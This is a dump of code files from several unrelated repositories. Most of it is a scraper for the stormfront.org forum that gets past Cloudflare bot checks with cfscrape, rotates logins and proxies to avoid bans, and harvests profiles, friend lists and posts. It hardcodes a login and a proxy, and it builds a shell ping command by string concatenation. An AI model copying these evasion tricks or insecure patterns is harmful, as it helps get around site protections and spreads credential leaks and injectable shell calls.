error = '비밀번호가 일치하지 않습니다.'
return render(request, 'getaway/signup.html', {'error': error})
else:
user = User.objects.create_user(
username=request.POST['username'],
password=request.POST['password1'],
email=request.POST['email'],
)
user.save()
return render(request, 'getaway/signupcomplete.html')
if request.method == 'GET':
return render(request, 'getaway/signup.html')
def login(request):
if request.method == 'GET':
return render(request, 'getaway/login.html')
elif request.method == 'POST':
username = request.POST.get('username', None)
password = request.POST.get('password', None)
if not (username and password):
error = '모든 값을 입력해야 합니다.'
else:
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
error = '아이디가 존재하지 않습니다.'
else:
if check_password(password, user.password):
request.session['user'] = user.id
return redirect('/') # 메인페이지
else:
error = '비밀번호가 틀렸습니다.'
return render(request, 'getaway/login.html', {'error': error})
def logout(request):
if request.session.get('user'):
del (request.session['user'])
return redirect('getaway:b_list')
def home(request):
user_id = request.session.get('user')
if user_id:
user = User.objects.get(pk=user_id)
return render(request, 'getaway/mainpage.html', {'user_id': {user}})
return render(request, 'getaway/mainpage.html')
@csrf_exempt
def tour_detail(request, contentId):
if request.method == 'POST':
try:
Tour.objects.get(t_name=contentId)
except Tour.DoesNotExist:
tour = Tour.objects.create(t_name=contentId)
if request.POST.get('what') == 'like':
tour.t_like += 1
tour.save()
if request.POST.get('what') == 'dis':
tour.t_dis += 1
tour.save()
else:
tour = Tour.objects.get(t_name=contentId)
if request.POST.get('what') == 'like':
tour.t_like += 1
tour.save()
if request.POST.get('what') == 'dis':
tour.t_dis += 1
tour.save()
return JsonResponse({'like': tour.t_like, 'dis': tour.t_dis})
if request.method == 'GET':
try:
User.objects.get(pk=request.session.get('user'))
except User.DoesNotExist:
user = 'None'
else:
user = User.objects.get(pk=request.session.get('user'))
print(user)
try:
tour = Tour.objects.get(t_name=contentId)
except Tour.DoesNotExist:
like = 0
dis = 0
else:
like = tour.t_like
dis = tour.t_dis
return render(request, 'getaway/tourboard.html', {'contentId': contentId, 'user': user, 'like': like, 'dis': dis})
# --------------------------------------- comment 뷰 함수
def c_create(request, board_id):
filled_form = CommentForm(request.POST)
if filled_form.is_valid():
finished_form = filled_form.save(commit=False)
finished_form.board = get_object_or_404(Board, pk=board_id)
finished_form.save()
return redirect('getaway:b_detail', board_id)
|
[
"/getaway/admin.py",
"/getaway/area_data.py",
"/getaway/forms.py",
"/getaway/migrations/0001_initial.py",
"/getaway/models.py",
"/getaway/urls.py",
"/getaway/views.py"
] |
01x01/flask-web
|
# coding: utf-8
import os
class Config(object):
SECRET_KEY = os.getenv('SECRET_KEY')
from .dev import DevConfig
from .qa import QAConfig
from .cm import CMConfig
from .prod import ProdConfig
config = {
"dev" : DevConfig,
"qa" : QAConfig,
"cm" : CMConfig,
"prod": ProdConfig
}
--- FILE SEPARATOR ---
# coding: utf-8
from . import Config
class CMConfig(Config):
pass
--- FILE SEPARATOR ---
# coding: utf-8
from . import Config
class DevConfig(Config):
pass
--- FILE SEPARATOR ---
# coding: utf-8
from . import Config
class ProdConfig(Config):
pass
--- FILE SEPARATOR ---
# coding: utf-8
from . import Config
class QAConfig(Config):
pass
--- FILE SEPARATOR ---
# coding: utf-8
from app import create_app
app = create_app('dev')
|
[
"/config/__init__.py",
"/config/cm.py",
"/config/dev.py",
"/config/prod.py",
"/config/qa.py",
"/main.py"
] |
02/storm
|
import pymongo
from datetime import datetime
import pprint
import bson
from pymongo import MongoClient
from random import randint
import time
class Database:
def __init__(self, dbname):
print("Connecting to database")
self.client = MongoClient()
self.db = self.client[dbname]
def drop_all_data(self):
self.db.post.drop()
self.db.thread.drop()
self.db.user.drop()
self.db.forum.drop()
self.db.friend.drop()
def drop_login_and_proxy(self):
self.db.login.drop()
self.db.proxy.drop()
def create_indexes(self):
self.db.forum.create_index([("id", pymongo.ASCENDING)], unique=True)
self.db.post.create_index([("id", pymongo.ASCENDING)], unique=True)
self.db.thread.create_index([("id", pymongo.ASCENDING)], unique=True)
self.db.user.create_index([("id", pymongo.ASCENDING)], unique=True)
self.db.login.create_index([("username", pymongo.ASCENDING)], unique=True)
self.db.proxy.create_index([("ip", pymongo.ASCENDING)], unique=True)
self.db.friend.create_index([("id1", pymongo.ASCENDING), ("id2", pymongo.ASCENDING)], unique=True)
## LOGIN AND PROXY MANAGEMENT
### DATABASE STRUCTURE: ####
# Proxy:
## ip: string <#key>
## broken: None or timestamp
## used: None or timestamp
# Login:
# username: string <#key>
# password: string
# used: True/False
# proxy: string ##ip to current proxy used
#### FUNCTIONS: ###
# get_login():
# Take a random unused login. If it doesn't have an IP to it, assign_user_a_random_unused_proxy(userid)
# assign_user_a_random_unused_proxy(userid)
# Take a random unused proxy. Set as proxy for userid. Return.
# proxy_down(proxyid,username):
# set broken: True for proxy.
# assign_user_a_random_unused_proxy()
# return new proxy
def set_login_broken(self,username):
self.db.login.update({'username': username}, {'$set': {'broken': True, 'broke_time': datetime.utcnow()}})
def set_user_not_processed(self,uid):
self.db.user.update({'id': uid}, {'$set': {'status': 0}})
def set_thread_not_processed(self, tid):
self.db.thread.update({'id': tid}, {'$set': {'status': 0}})
def set_all_logins_not_used(self):
self.db.login.update({}, {'$set': {'used': None}},multi=True)
def push_login(self, username, password):
data = {"username":username,"password":password,"used": None, "proxy": None}
result = self.db.login.update({"username": username}, data, True)
if result['updatedExisting']:
print('User already existed. Updated.')
def push_proxy(self, ip):
data = {"ip":ip, "broken": None,"used": None}
result = self.db.proxy.update({"ip": ip}, data, True)
def set_login_not_used(self,username):
self.db.login.update({"username": username}, {'$set': {'used': None}})
def get_all_login(self):
ret = self.db.login.find({'broken': None})
logins = []
for login in ret:
if login['proxy'] is None:
login['proxy'] = self.assign_login_a_random_unused_proxy(login['username'])
logins.append(login)
# Set used
self.db.login.update({}, {'$set': {'used': datetime.utcnow()}}, multi=True)
return logins
def pop_login(self):
nr = self.db.login.find({'used': None, 'broken': None}).count()
if nr == 0:
return None
ret = self.db.login.find({'used': None, 'broken': None}).limit(-1).skip(randint(0, nr-1)).next()
username = ret['username']
# Set used
self.db.login.update({"username": username}, {'$set': {'used': datetime.utcnow()}})
if ret['proxy'] is None:
ret['proxy'] = self.assign_login_a_random_unused_proxy(username)
return ret
def assign_login_a_random_unused_proxy(self,username):
nrproxies = self.db.proxy.find({'used': None, 'broken': None}).count()
ret = self.db.proxy.find({'used': None, 'broken': None}).limit(-1).skip(randint(0,nrproxies-1)).next()
ip = ret['ip']
#Set used
self.db.proxy.update({"ip": ip}, {'$set': {'used': datetime.utcnow()}})
#Assign to user
self.db.login.update({"username": username}, {'$set': {'proxy': ip}})
return ip
def set_proxy_down_assign_new(self,ip,username):
self.db.proxy.update({"ip": ip}, {'$set': {'broken': datetime.utcnow()}})
return self.assign_login_a_random_unused_proxy(username)
######### Thread management
#Data structure
#Thread:
# id
# title
# parent_id
# processed: None or timestamp
def add_thread(self,tid,data):
data['inserted'] = datetime.utcnow()
data['status'] = 2
result = self.db.thread.update({"id": tid}, data, True)
#If we got interrupted halfway before, we'll start over with them when we restart
def set_all_threads_not_used(self):
result = self.db.thread.update({"status": 1}, {'$set': {'status': 0}})
def thread_completed(self,tid):
result = self.db.thread.update({"id": tid}, {'$set': {'status': 2, 'completed': datetime.utcnow()}})
def thread_failed(self,tid,message):
result = self.db.thread.update({"id": tid}, {'$set': {'status': -1, 'completed': datetime.utcnow(),'failmessage': message}})
def populate_threads_to_be_fetched(self,fromnr,tonr):
#Add all
for i in range(fromnr,tonr):
self.db.thread.update({'id': i},{'$setOnInsert':{'id': i,'status': 0}},True)
def pop_thread(self):
nr = self.db.thread.find({'status': 0}).count()
if nr == 0:
return None
ret = self.db.thread.find({'status': 0}).limit(-1).skip(randint(0, nr-1)).next()
tid = ret['id']
# Set used
self.db.thread.update({"id": tid}, {'$set': {'status': 1, 'processing_start': datetime.utcnow()}})
return tid
## Posts
def add_post(self,pid,data):
data['inserted'] = datetime.utcnow()
result = self.db.post.update({"id": pid}, data, True)
#### Users management
## Friends:
# id1
# id2
# User:
# id,username,inserted, ..
# status: 0 - non-processed, 1 - under processing, -1 error, 2 processed
def set_all_users_not_used(self):
result = self.db.user.update({"status": 1}, {'$set': {'status': 0}})
def pop_user(self):
nr = self.db.user.find({'status': 0}).count()
if nr == 0:
return None
ret = self.db.user.find({'status': 0}).limit(-1).skip(randint(0, nr - 1)).next()
self.set_user_processing(ret['id'])
return ret['id']
def set_user_processing(self,uid):
result = self.db.user.update({"id": uid}, {'$set': {'processing_started': datetime.utcnow(), 'status': 1}})
def set_user_failed(self,uid,status_code):
result = self.db.user.update({"id": uid}, {'$set': {'processing_finished': datetime.utcnow(), 'status': -1, 'error_code': status_code}})
def populate_users_to_be_fetched(self, fromnr, tonr):
# Add all
for i in range(fromnr, tonr):
self.db.user.update({'id': i}, {'$setOnInsert': {'id': i,'status': 0}}, True)
def add_user(self,uid,data):
result = self.db.user.update({"id": uid}, data, True)
result = self.db.user.update({"id": uid}, {'$set': {'processing_finished': datetime.utcnow(), 'status': 2} })
def add_friends(self,user_id1,with_users):
for user_id2 in with_users:
data = {"id1": user_id1,"id2": user_id2}
self.db.friend.update(data, data, True)
## FORUMS
#forum: id, title, parentid
def add_forum(self,fid,data):
self.db.forum.update({"id": fid}, data, True)
--- FILE SEPARATOR ---
from __future__ import print_function
import sys
import pprint
import requests
import cfscrape
import datetime
import hashlib
import time
import random
import logging
from platform import system as system_name # Returns the system/OS name
from os import system as system_call # Execute a shell command
from lxml import html
from lxml import etree
from database import Database
short_pause_min = 1
short_pause_max = 3
long_pause_min = 30
long_pause_max = 60
class Fetcher:
def __init__(self, username, password, proxy, timeout=120):
self.cookies = None
self.username = username
self.password = password
self.timeout = timeout
#Connect to database.
self.db = Database("stormfront")
self.scraper = cfscrape.create_scraper()
self.set_proxy(proxy)
self.logger = logging.getLogger('thread_' + username)
hdlr = logging.FileHandler('../log/thread_' + username + '.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
self.logger.addHandler(hdlr)
self.logger.setLevel(logging.INFO)
@staticmethod
def short_pause():
time.sleep(random.randint(short_pause_min, short_pause_max))
@staticmethod
def long_pause():
time.sleep(random.randint(long_pause_min, long_pause_max))
def set_proxy(self, proxy):
if proxy is not None:
self.proxy = {
'http': proxy,
#'https': proxy,
}
else:
self.proxy = None
def try_another_proxy(self):
new_proxy = self.db.set_proxy_down_assign_new(self.proxy['http'], self.username)
if new_proxy is None:
raise Exception("Ran out of proxies! Giving up.")
self.set_proxy(new_proxy)
self.login()
@staticmethod
def ping(host):
"""
Returns True if host (str) responds to a ping request.
Remember that some hosts may not respond to a ping request even if the host name is valid.
"""
# Ping parameters as function of OS
parameters = "-n 1" if system_name().lower() == "windows" else "-c 1"
# Pinging
return system_call("ping " + parameters + " " + host) == 0
def get(self,url, **kwargs):
# Try posting, if it fails, try to ping stormfront.org
# If successful, it's probably the proxy that's the problem. Change proxy and try again.
# If failed, its the internet or stormfront. Wait for X minutes then try again.
# If result returned, check whether we have been logged out.
# If we have been logged out, call login(). Then try again. If same fail again, user has been blocked: give up().
# self.scraper.post(url,**kwargs)
attempts_error_status_code = 20
attempts_logged_out = 10
success = False
while not success:
try:
self.logger.info("Getting data.")
self.logger.info(kwargs)
res = self.scraper.get(url, **kwargs)
self.logger.info(res.content)
self.logger.info("\n\n\n\n")
if res.status_code == 501:
#or res.status_code == 403:
self.logger.error("WARNING: Got error status code: %s, reason: %s." % (res.status_code, res.reason))
if attempts_error_status_code > 0:
self.logger.error("Trying to solve by logging in.")
self.login()
attempts_error_status_code -= 1
continue
else:
self.logger.error("Already tried all attempts. Giving up.")
self.db.set_login_broken(self.username)
raise RuntimeError("Got status error too many times. Giving up. %s, reason: %s." % (res.status_code, res.reason))
elif 400 <= res.status_code < 600:
self.logger.error("WARNING: Got error status code: %s, reason: %s." % (res.status_code, res.reason))
self.logger.error("Not sure what to do. Just saying.")
#self.logger.error(res.content)
if len(html.fromstring(res.content).xpath("//input[@value='guest']")) > 0 or len(
html.fromstring(res.content).xpath("//input[@value='Log in']")) > 0:
self.logger.error("WARNING: No longer seem to be logged in.")
if attempts_logged_out > 0:
self.logger.error("Trying to solve by logging in...")
self.login()
attempts_logged_out -= 1
continue
else:
self.logger.error("Already tried all attempts. Giving up.")
raise RuntimeError("Thread %s got logged out too many times. Giving up." % self.username)
success = True
return res
except KeyboardInterrupt:
raise
except RuntimeError:
raise
#except requests.exceptions.RequestException:
except:
self.logger.error("WARNING: Post failed. Trying ping...")
if Fetcher.ping("www.stormfront.org"):
#Ping without using proxy. If works, it is probably the proxy that's fucked. Change proxy.
self.logger.error("Got response from ping. Probably proxy that's down. Trying another.")
self.try_another_proxy()
else:
#No ping, probably internet or SF that's down. Long rest then try again!
self.logger.error("No reponse. Probably SF or internet that's down. Resting and then trying again.")
Fetcher.long_pause()
def login(self):
self.cookies = None
self.headers = None
#Spread out connections a bit
time.sleep(random.randint(0, 15))
self.logger.info("Attempting to by-pass CloudFare bot control...")
#print(self.scraper.get("https://www.stormfront.org").content)
#cookie_value, user_agent = cfscrape.get_cookie_string("https://www.stormfront.org")
fail = True
while fail:
try:
cf_cookie, user_agent = cfscrape.get_tokens("https://www.stormfront.org",proxies=self.proxy)
fail = False
except requests.exceptions.RequestException:
# Probably the proxy!
self.try_another_proxy()
#self.cookies = cookie_value
#request = "Cookie: %s\r\nUser-Agent: %s\r\n" % (cookie_value, user_agent)
#print(request)
self.logger.info("Logging in with user %s..." % self.username)
self.headers = {
'origin': 'https://www.stormfront.org',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-US,en;q=0.8',
# 'cookie': 'gsScrollPos=; __cfduid=d3a7beab45ee0e73ce2785686259bcff41491228171; VRcheck=%2C339842%2C; bb2sessionhash=b9433f62d9ed52d02089e2546c415744',
'pragma': 'no-cache',
'upgrade-insecure-requests': '1',
'user-agent': user_agent,
#'cookie': cookie_value,
#'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'content-type': 'application/x-www-form-urlencoded',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'cache-control': 'no-cache',
'authority': 'www.stormfront.org',
'referer': 'https://www.stormfront.org/forum/login.php?do=logout',
}
params = (
('do', 'login'),
)
hashedpass = hashlib.md5(self.password.encode('utf-8')).hexdigest()
data = [
('vb_login_username', self.username),
('vb_login_password', ''),
('s', ''),
#('securitytoken', '1493064359-73f4ce2367aaca04b9fd76e322c94ec4655866ec'),
('securitytoken', 'guest'),
('do', 'login'),
('vb_login_md5password', hashedpass),#
('vb_login_md5password_utf', hashedpass),### hashlib.md5(self.password) ?????????
]
res = self.scraper.post('https://www.stormfront.org/forum/login.php', headers=self.headers, cookies=cf_cookie, params=params, data=data, timeout=self.timeout, proxies = self.proxy)
#res = self.post(db,'https://www.stormfront.org/forum/login.php', headers=self.headers, cookies=cf_cookie, params=params, data=data, timeout=self.timeout, proxies = self.proxy)
self.cookies = res.cookies
requests.utils.add_dict_to_cookiejar(self.cookies, cf_cookie)
#pprint.pprint(self.cookies)
self.logger.info(res.content)
res.raise_for_status()
def fetch_all_users(self):
self.logger.info("Beginning user download...")
user_id = self.db.pop_user()
while user_id is not None:
self.logger.info("Scraping user %s..." % user_id)
self.get_user_friendlist(user_id)
self.get_user_info(user_id)
self.logger.info("Taking short rest...")
Fetcher.short_pause()
user_id = self.db.pop_user()
self.logger.info("User scraping completed.")
def get_user_friendlist(self, userid):
params = {
'tab': 'friends',
'u': userid,
'pp': '10000',
'page': '1',
}
r = self.get('https://www.stormfront.org/forum/member.php', headers=self.headers, params=params,cookies=self.cookies, timeout=self.timeout, proxies=self.proxy)
tree = html.fromstring(r.content)
names = tree.xpath('//a[@class="bigusername"]')
with_ids = [name.attrib['href'].split("=")[1] for name in names]
self.db.add_friends(userid,with_ids)
@staticmethod
def clean_text_string(string):
string = string.replace("\\n"," ")
string = string.replace("\\r", " ")
string = string.replace("\\t", " ")
return ' '.join(string.split())
def get_user_info(self, userid):
params = {'u': userid}
#r = self.scraper.get('https://www.stormfront.org/forum/member.php',headers=self.headers, params=params, cookies=self.cookies, timeout=self.timeout, proxies = self.proxy)
r = self.get('https://www.stormfront.org/forum/member.php', headers=self.headers, params=params,
cookies=self.cookies, timeout=self.timeout, proxies=self.proxy)
tree = html.fromstring(r.content)
#names = tree.xpath('//*[@id="username_box"]/h1//*/text()')
names = tree.xpath("//td[@id='username_box']")
if len(names) == 0:
self.logger.info("WARNING: Failed getting user id %s" % userid)
self.db.set_user_failed(userid,r.status_code)
else:
name = Fetcher.clean_text_string(etree.tostring(names[0], method='text', encoding='UTF-8').decode("UTF-8"))
profiles = tree.xpath('//div[@id="collapseobj_aboutme"]')
profiletext,profiletextonly = "",""
if len(profiles)>0:
profile = profiles[0]
profiletext = etree.tostring(profile,encoding='UTF-8').decode("UTF-8")
profiletextonly = Fetcher.clean_text_string(etree.tostring(profile, method='text', encoding='UTF-8').decode("UTF-8"))
ministats = tree.xpath('//div[@id="collapseobj_stats_mini"]')
ministattext,ministattextonly = "",""
if len(ministats) > 0:
ministat = ministats[0]
ministattext = etree.tostring(ministat,encoding='UTF-8').decode("UTF-8")
ministattextonly = Fetcher.clean_text_string(etree.tostring(ministat, method='text', encoding='UTF-8').decode("UTF-8"))
data = {'id': userid, 'name': name, 'ministat': profiletext, 'profile': ministattext,
'ministattext': profiletextonly, 'profiletext': ministattextonly}
self.db.add_user(userid,data)
@staticmethod
def parse_date(datestr):
datestr = datestr.strip().lower()
if datestr.startswith("yesterday"):
#e.g. Yesterday, 05:34 PM
timestr = datestr[len("yesterday,"):].strip()
time = datetime.datetime.strptime(timestr, "%I:%M %p")
yesterday = datetime.datetime.today() - datetime.timedelta(1)
return yesterday.replace(hour=time.hour, minute=time.minute,second=0,microsecond=0)
elif datestr.startswith("today"):
#Today, 06:03 AM
timestr = datestr[len("today,"):].strip()
time = datetime.datetime.strptime(timestr, "%I:%M %p")
return datetime.datetime.today().replace(hour=time.hour, minute=time.minute,second=0,microsecond=0)
else:
# 05-29-2017, 01:41 PM
return datetime.datetime.strptime(datestr, "%m-%d-%Y, %I:%M %p")
def fetch_all_threads(self):
# login = db.pop_login()
# fetch = fetcher.Fetcher(login['username'], login['password'], login['proxy'])
self.logger.info("### Beginning thread download with user %s..." % self.username)
thread_id = self.db.pop_thread()
while thread_id is not None:
self.logger.info("## %s Scraping thread %s..." % (self.username, thread_id))
page = 1
has_more_pages = True
while has_more_pages:
self.logger.info("# %s Scraping thread %s, page %s... " % (self.username, thread_id, page))
has_more_pages = self.fetch_thread_page(thread_id, page)
page += 1
Fetcher.short_pause()
thread_id = self.db.pop_thread()
self.logger.info("Thread scraping completed.")
def fetch_thread_page(self,tid,page):
# headers = {
# 'pragma': 'no-cache',
# 'accept-encoding': 'gzip, deflate, sdch, br',
# 'accept-language': 'en-US,en;q=0.8',
# 'upgrade-insecure-requests': '1',
# 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
# 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
# 'cache-control': 'no-cache',
# 'authority': 'www.stormfront.org',
# # 'cookie': cookie, #'gsScrollPos=;__cfduid=d3a7beab45ee0e73ce2785686259bcff41491228171; VRcheck=%2C339842%2C;bb2lastvisit=1493064370; bb2lastactivity=0; bb2sessionhash=a3ef28efe4019980f3c84ed019b33386',
# 'referer': 'https://www.stormfront.org/forum/login.php?do=login',
# }
params = (
)
#r = self.scraper.get("https://www.stormfront.org/forum/t{}-{}/".format(tid,page),
# headers=headers, params=params, cookies=self.cookies, timeout=self.timeout)
r = self.get("https://www.stormfront.org/forum/t{}-{}/".format(tid,page),
headers=self.headers, params=params, cookies=self.cookies, timeout=self.timeout)
tree = html.fromstring(r.content)
#Does thread exist?
error_message = "".join(tree.xpath("//td[@class='panelsurround']/div[@class='panel']/div//text()")).lower()
if error_message.count("no thread specified.") > 0:
#thread does not exist
self.logger.warning("No thread specified message. Moving on.")
self.db.thread_failed(tid,"no thread specified")
return False
elif error_message.count("invalid thread specified.") > 0:
self.logger.warning("Invalid thread message. Moving on.")
self.db.thread_failed(tid, "invalid thread specified")
return False
else:
messages = tree.xpath("//div[@id='posts']//table[starts-with(@id,'post')]")
if len(messages) == 0:
self.logger.warning("No messages in thread. Moving on")
self.db.thread_failed(tid, "no message found")
return False
#First page! Create thread and forums
if page == 1:
forums = tree.xpath("//span[@class='navbar']/a")
# create forums
parentid = None
for fi in range(1, len(forums)):
forumid = forums[fi].attrib["href"].split("/forum/f")[1][:-1]
forumtitle = forums[fi].xpath("span/text()")[0]
data = {'id': forumid, 'title': forumtitle, 'parent': parentid}
self.db.add_forum(forumid,data)
parentid = forumid
threadtitle = tree.xpath("//td[@class='navbar']//strong/span[@itemprop='title']/text()")[0]
threaddate = ''.join(messages[0].xpath('.//td[@class="thead"][1]/text()')).strip()
threaddateparse = Fetcher.parse_date(threaddate)
data = {'id': tid, 'title': threadtitle, 'forum': parentid, 'createdate': threaddateparse, 'createdatestr': threaddate }
self.db.add_thread(tid,data)
#Process posts
i = 0
for message in messages:
i = i + 1
messageid = message.attrib['id'].split('t')[1]
authorids = message.xpath('.//*[@class="bigusername"]')
if len(authorids) == 0:
#No author id, probably guest user
authorid = 0
self.logger.warning("No author id found for post. Assuming guest user.")
else:
authorid = authorids[0].attrib['href'].split('=')[1]
datestr = ''.join(message.xpath('.//td[@class="thead"][1]/text()')).strip()
dateparse = Fetcher.parse_date(datestr)
#dateparse = datetime.datetime.strptime(datestr,"%m-%d-%Y, %I:%M %p")
fullmessage = message.xpath(".//*[starts-with(@id,'post_message_')]")[0]
fullmessagehtml = etree.tostring(fullmessage,encoding='UTF-8').decode("UTF-8")
cleanmessage = " ".join(fullmessage.xpath("./text()|./*[not(self::div)]//text()")).strip()
signature = " ".join(message.xpath(".//div[@class='hidesig']//text()")).strip()
titlem = message.xpath(".//td[@class='alt1']/div/strong/text()")
if len(titlem) == 0:
title = ""
else:
title = titlem[0]
hasquote = False
quoteofpostid, quoteofusername,quotehtml,quotetxt = None,None,None,None
#if len(quote) > 0:
quote = fullmessage.xpath(".//div/table//tr/td/div[1]/a")
quotetop = fullmessage.xpath(".//div/table//tr/td/div[1]/text()")
if len(quotetop) > 0 and quotetop[0].lower().count("originally posted by") and len(quote) > 0:
hasquote = True
if quote[0].attrib["href"].count("post") == 0:
#This is a quote of a newspaper or something else, not from a user. We don't treat it as a quote
hasquote = False
else:
quoteofpostid = quote[0].attrib["href"].split("post")[1]
quoteofusernames = fullmessage.xpath(".//div/table//tr/td/div[1]/strong/text()")
if len(quoteofusernames) == 0:
quoteofusername = ""
self.logger.warning("No username quoted, but looks like user quote. Assuming email based username,")
else:
quoteofusername = quoteofusernames[0]
quotehtmls = fullmessage.xpath(".//div/table//tr/td/div[2]")
if len(quotehtmls) == 0:
self.logger.warning("Looks like quote, but can't find it. Just gonna skip it.")
hasquote = False
else:
quotehtml = etree.tostring(fullmessage.xpath(".//div/table//tr/td/div[2]")[0],encoding='UTF-8').decode("UTF-8")
quotetxt = " ".join(fullmessage.xpath(".//div/table//tr/td/div[2]//text()"))
#ADD TO DATABASE
data = {'id': messageid, 'authorid': authorid, 'posteddate': dateparse,
'fullmessagehtml': fullmessagehtml, 'cleanmessage': cleanmessage, 'signature': signature,
'title': title, 'hasquote': hasquote, 'quoteofpostid': quoteofpostid, 'quoteofusername': quoteofusername,
'quotehtml': quotehtml,'quotetxt': quotetxt}
#pprint.pprint(data)
self.db.add_post(messageid, data)
#Is there a next page?
return len(tree.xpath("//td[@class='alt1']/a[@rel='next']")) > 0
if __name__ == '__main__':
fetch = Fetcher("wickedness","tintolito","86.62.108.219:53281")
fetch.login()
#fetch.get_user_info(288029)
fetch.fetch_thread_page(1170137,1)
#fetch.get_user_friendlist(1)
#fetch.fetch_thread_page(1213459, 1)
# fetch.get_user_friendlist(2)
# fetch.get_user_friendlist(3)
# fetch.get_user_friendlist(4)
# fetch.get_user_friendlist(5)
--- FILE SEPARATOR ---
from multiprocessing import Pool
import multiprocessing
import sys
import os
import random
import time
import database
import fetcher
db = None
def fetch_all_users_single():
login = db.pop_login()
fetch_all_users(login['username'], login['password'], login['proxy'])
def fetch_all_users_parallel():
logins = db.get_all_login()
jobs = []
for login in logins:
p = multiprocessing.Process(target=fetch_all_users, args=(login['username'],login['password'],login['proxy']))
jobs.append(p)
p.start()
print("Out of loop.")
def fetch_all_users(username,password,proxy):
fetch = fetcher.Fetcher(username, password, proxy)
fetch.login()
fetch.fetch_all_users()
def fetch_all_threads_parallel():
logins = db.get_all_login()
jobs = []
for login in logins:
p = multiprocessing.Process(target=fetch_all_threads, args=(login['username'],login['password'],login['proxy']))
jobs.append(p)
p.start()
print("Out of loop.")
def fetch_all_thread_single():
login = db.pop_login()
fetch_all_threads(login['username'], login['password'], login['proxy'])
def fetch_all_threads(username,password,proxy):
fetch = fetcher.Fetcher(username, password, proxy)
fetch.login()
fetch.fetch_all_threads()
#
# login = db.pop_login()
# fetch = fetcher.Fetcher(login['username'], login['password'], login['proxy'])
#
# fetch.login()
#
# while(True):
# thread = db.pop_thread()
# id = thread['id']
#
# page = 1
# has_more_pages = True
# while has_more_pages:
# has_more_pages = fetch.fetch_thread_page(id, page, db)
# page += 1
# short_pause()
#
# db.thread_completed(id)
# Repeat:
# Login
# Repeat:
# Take a random un-fetched thread from database, mark as being under processing
# Fetch thread fetch_thread_page(cookie, 1208742, 1) #1208742
# Pause randomly
#sleep a bit
def query_yes_no(question, default="yes"):
"""Ask a yes/no question via raw_input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is True for "yes" or False for "no".
"""
valid = {"yes": True, "y": True, "ye": True,
"no": False, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(question + prompt)
choice = input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "
"(or 'y' or 'n').\n")
### Callable functions
def print_instructions():
print("storm.py <COMMAND>")
print("Possible commands:")
print("--clean-data \t\t\t Removes all scraped data.")
print("--clean-login \t\t\t Removes all logins and proxies.")
print("--start-get-users <from_id> <to_id> \t\t\t Start download of users.")
print()
print("--populate-users <from_id> <to_id> \t\t\t Set user ids to download.")
print("--get-users \t\t\t Continue user download. All users in parallel.")
print("--get-users-single \t\t\t Continue user download. Single thread.")
print()
print("--populate-threads <from_id> <to_id> \t\t\t Set threads to download.")
print("--get-threads-single \t\t\t Continue previous user download.")
print("--get-threads-parallel \t\t\t Continue previous user download.")
print()
print("--add-proxy <IP> \t\t\t Add proxy to proxy list.")
print("--add-login <username> <password> \t\t\t Add new user to login list.")
print("--monitor-new-posts \t\t\t Continuously scrape new posts. NOT YET IMPLEMENTED.")
print("--monitor-new-users \t\t\t Continuously scrape new users. NOT YET IMPLEMENTED.")
def test(arg):
for i in range(100):
print(arg, i)
time.sleep(random.random())
def main():
print("Starting up!")
if len(sys.argv) < 2:
print("Please provide arguments.")
print_instructions()
exit()
command = sys.argv[1].strip()
global db
db = database.Database("stormfront")
#Reset all interrupted processes and logins etc.
db.set_all_logins_not_used()
db.set_all_threads_not_used()
db.set_all_users_not_used()
# print(command,sys.argv[2].strip())
if command == "--clean-data":
if query_yes_no("Are you sure you want to empty database?", "no"):
print('Cleaning database...')
db.drop_all_data()
db.create_indexes()
else:
print("Leaving database intact.")
elif command == "--clean-login":
if query_yes_no("Are you sure you want to empty database?", "no"):
print('Cleaning database...')
db.drop_login_and_proxy()
else:
print("Leaving database intact.")
elif command == "--populate-users":
if len(sys.argv) != 4:
print_instructions()
exit()
print("Populating user database...")
db.populate_users_to_be_fetched(int(sys.argv[2]),int(sys.argv[3]))
elif command == "--get-users":
print("Continuing user download parallelized...")
fetch_all_users_parallel()
elif command == "--get-users-single":
print("Continuing user download single thread...")
fetch_all_users_single()
elif command == "--get-threads-single":
print("Continuing thread download...")
fetch_all_thread_single()
elif command == "--get-threads":
print("Continuing thread download...")
fetch_all_threads_parallel()
elif command == "--populate-threads":
if len(sys.argv) != 4:
print_instructions()
exit()
print("Populating thread database...")
# Add to thread database all number between fromid to toid.
db.populate_threads_to_be_fetched(int(sys.argv[2]), int(sys.argv[3]))
elif command == "--add-proxy":
if len(sys.argv) != 3:
print_instructions()
exit()
db.push_proxy(sys.argv[2])
elif command == "--add-login":
if len(sys.argv) != 4:
print_instructions()
exit()
db.push_login(sys.argv[2],sys.argv[3])
#TODO later
#print("--monitor-new-posts \t\t\t Continuously scrape new posts.")
#print("--monitor-new-users \t\t\t Continuously scrape new users.")
else:
print("Unknown instructions.")
print_instructions()
#cookie = login()
#get_user_friendlist(1, cookie)
#get_user_info(336591, cookie)
#fetch_thread_page(cookie, 1208742, 1) #1208742
#there are 242542 users, 340190 ids
#2 fetch per user. 700,000 fetches.
if __name__ == '__main__':
main()
|
[
"/database.py",
"/fetcher.py",
"/storm.py"
] |
0210-greyorange/Medical-model-visualization
|
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import cv2
import numpy as np
def nor(img, min=0, max=1):
image_new = (img - np.min(img)) * (max - min) / (np.max(img) - np.min(img)) + min
return image_new
class ConvNet(nn.Module):
def __init__(self):
